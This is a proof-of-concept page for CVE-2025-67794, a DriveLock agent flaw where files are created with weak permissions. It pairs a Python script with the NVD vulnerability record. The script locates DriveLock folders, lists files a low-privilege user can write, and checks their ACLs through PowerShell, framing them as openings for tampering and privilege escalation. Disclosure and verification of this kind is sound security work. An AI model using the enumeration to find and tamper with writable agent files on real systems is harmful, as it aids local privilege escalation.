CVE-2025-67794

# CVE-2025-67794 PoC - DriveLock Agent Permission Misconfiguration # This PoC demonstrates how low-privilege users can access DriveLock agent files import os import sys import subprocess import json from pathlib import Path def check_driveLock_installed(): """Check if DriveLock is installed on the system""" possible_paths = [ r"C:\Program Files\DriveLock", r"C:\Program Files (x86)\DriveLock", r"C:\ProgramData\DriveLock", os.environ.get('ProgramData', 'C:\\ProgramData') + r"\DriveLock" ] for path in possible_paths: if os.path.exists(path): return path return None def enumerate_driveLock_files(install_path): """Enumerate files created by DriveLock agent with overly permissive ACLs""" exploitable_files = [] for root, dirs, files in os.walk(install_path): for file in files: file_path = os.path.join(root, file) try: # Check if current user can write to the file if os.access(file_path, os.W_OK): exploitable_files.append({ 'path': file_path, 'writable': True, 'readable': os.access(file_path, os.R_OK) }) except PermissionError: continue return exploitable_files def check_acl_permissions(file_path): """Check ACL permissions on DriveLock files using PowerShell""" cmd = f'powershell -Command "Get-Acl \"{file_path}\" | Select-Object -ExpandProperty Access | ConvertTo-Json"' try: result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=10) if result.returncode == 0 and result.stdout: return json.loads(result.stdout) except Exception as e: print(f"Error checking ACL: {e}") return None def main(): print("=" * 60) print("CVE-2025-67794 PoC - DriveLock Agent Permission Issue") print("=" * 60) # Check if DriveLock is installed install_path = check_driveLock_installed() if not install_path: print("[-] DriveLock not found on this system") return print(f"[+] DriveLock installation found at: {install_path}") # Enumerate exploitable files print("\n[*] Enumerating files with overly permissive ACLs...") exploitable = enumerate_driveLock_files(install_path) if exploitable: print(f"[+] Found {len(exploitable)} writable files/directories:") for item in exploitable[:10]: # Show first 10 print(f" - {item['path']}") print(f" Writable: {item['writable']}, Readable: {item['readable']}") # Check detailed ACL acl = check_acl_permissions(item['path']) if acl: print(f" ACL check: File has potentially insecure permissions") else: print("[-] No writable files found or DriveLock may already be patched") print("\n[*] Attack Impact:") print(" - Low-privilege users can modify DriveLock agent files") print(" - May lead to agent destabilization or privilege escalation") print(" - Config/log files may contain sensitive information") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-67794", "sourceIdentifier": "[email protected]", "published": "2025-12-17T22:16:00.033", "lastModified": "2025-12-18T20:16:08.807", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in DriveLock 24.1 through 24.1.*, 24.2 before 24.2.8, and 25.1 before 25.1.6. Directories and files created by the agent are created with overly permissive ACLs, allowing local users without administrator rights to trigger actions or destabilize the agent."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:drivelock:drivelock:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.1", "versionEndIncluding": "24.1.4", "matchCriteriaId": "3BC18C3F-72CF-427C-ACE9-AD5991B25CB9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:drivelock:drivelock:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.2", "versionEndExcluding": "24.2.8", "matchCriteriaId": "53D1B5B2-C669-40F0-89CE-C0354A897676"}, {"vulnerable": true, "criteria": "cpe:2.3:a:drivelock:drivelock:*:*:*:*:*:*:*:*", "versionStartIncluding": "25.1", "versionEndExcluding": "25.1.6", "matchCriteriaId": "3FD804DF-40A9-4A76-950E-06EBD968CFE9"}]}]}], "references": [{"url": "https://drivelock.help/sb/Content/SecurityBulletins/25-009-AgIncPermissions.htm", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}